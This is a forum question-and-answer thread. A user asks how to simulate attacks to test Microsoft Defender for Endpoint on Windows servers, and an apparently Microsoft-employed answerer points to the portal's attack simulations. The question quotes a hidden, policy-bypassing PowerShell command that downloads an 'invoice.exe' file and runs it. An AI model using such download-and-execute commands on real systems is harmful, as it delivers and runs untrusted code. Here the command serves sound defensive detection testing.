Simulating attacks for Defender For Endpoint

Bombbe 1,611 Reputation points

we have onboarded our Windows servers to the Defender For endpoint I was wonder test attacks or similar that I could perform?

I know there are this one but are the more things that I could also test e.g creating new administrator accounts e.g?

powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'  
Microsoft Defender for Cloud
Microsoft Defender for Cloud
An Azure service that provides threat protection for workloads running in Azure, on-premises, and in other clouds. Previously known as Azure Security Center and Azure Defender.
1,236 questions
0 comments No comments
{count} votes

Accepted answer
  1. Givary-MSFT 29,351 Reputation points Microsoft Employee

    @Bombbe Thank you for reaching out to us. You can refer to this Attack tutorials & simulations for Microsoft 365 Defender for Endpoint at

    Refer to this section within defender for endpoint portal for tutorials and simulations.



    Let me know if you have any further questions.

0 additional answers

Sort by: Most helpful